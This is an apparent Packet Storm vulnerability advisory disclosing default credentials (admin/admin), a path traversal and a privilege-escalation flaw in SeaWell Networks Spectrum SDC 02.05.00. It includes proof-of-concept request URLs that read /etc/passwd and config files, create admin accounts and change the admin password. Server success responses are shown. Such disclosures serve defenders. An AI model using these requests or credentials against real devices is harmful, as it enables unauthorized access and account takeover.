what you don't know can hurt you

SeaWell Networks Spectrum SDC 02.05.00 Traversal / Privilege Escalation

SeaWell Networks Spectrum SDC 02.05.00 Traversal / Privilege Escalation
Posted Jan 18, 2016
Authored by Karn Ganeshen

SeaWell Networks Spectrum SDC version 02.05.00 suffers from weak default credentials, path traversal, and privilege escalation vulnerabilities.

tags | exploit, vulnerability, file inclusion
advisories | CVE-2015-8282, CVE-2015-8283, CVE-2015-8284
MD5 | 63bc15aeb66b5d194085b1e3d8c1ed69

SeaWell Networks Spectrum SDC 02.05.00 Traversal / Privilege Escalation

Change Mirror Download
# Exploit Title: [SeaWell Networks Spectrum - Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.seawellnetworks.com/spectrum/]
# Versions Reported: [Spectrum SDC 02.05.00, Build 02.05.00.0016]

CVE-ID:
CVE-2015-8282
CVE-2015-8283
CVE-2015-8284

About SeaWell Networks Spectrum

Session Delivery Control

SeaWell set out to improve the way operators control, monetize and scale their IP video offerings, to meet the growing subscriber demands for video delivered to smartphones, tablets and game consoles.

The result – Spectrum – is what we call a “Multiscreen 2.0” Session Delivery Controller.

Spectrum is high-performance, carrier-grade software that takes ABR video and repackages it – on-the-fly – into any other protocol, including Apple HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.

http://www.seawellnetworks.com/spectrum/

Affected version
Spectrum SDC 02.05.00
Build 02.05.00.0016
Copyright (c) 2015 SeaWell Networks Inc.

A. CWE-255: Credentials Management
CVE-2015-8282

Weak, default login credentials - admin / admin

B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVE-2015-8283

The configure_manage.php module accepts a file parameter which takes an unrestricted file path as input, allowing an attacker (non-admin, low- privileged user) to read arbitrary files on the system.

PoC:

https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd

C. CWE-285: Improper Authorization
CVE-2015-8284

A low privileged, non-admin user, with only viewer privileges, can perform administrative functions, such as create, update, delete a user (including admin user), or access device's configuration files (policy.xml, cookie_config.xml, systemCfg.xml). The application lacks Authorization controls to restrict any non-admin users from performing admin functions.

The application users can have admin or viewer privilege levels. Admin has full access to the device. Viewer has access to very restricted functions.

It is possible for a viewer priv user to perform admin functions.

PoC:

Add new user [Admin function only]

GET /system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow= HTTP/1.1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

Here

admin -> userlevel=9
viewer -> userlevel=1

Create new user with Admin privs
Log in as viewer - try create new admin user - viewer1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Delete user

https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

Modify existing user (including admin)
log in as viewer - try change system (admin) user

https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Change Admin password
log in as viewer - try change admin pass

https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Downloading configuration xml files

viewer priv user has no access/option to config xmls via GUI. It is possible to download the configs by calling the url directly

Access policy config xml
https://IP/configure_manage.php?action=download_config&file=policy.xml

Access cookie config xml
https://IP/configure_manage.php?action=download_config&file=cookie_config.xml

Access system config xml
https://IP/configure_manage.php?action=download_config&file=systemCfg.xml

+++++
--
Best Regards,
Karn Ganeshen

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    3 Files
  • 21
    Oct 21st
    12 Files
  • 22
    Oct 22nd
    11 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close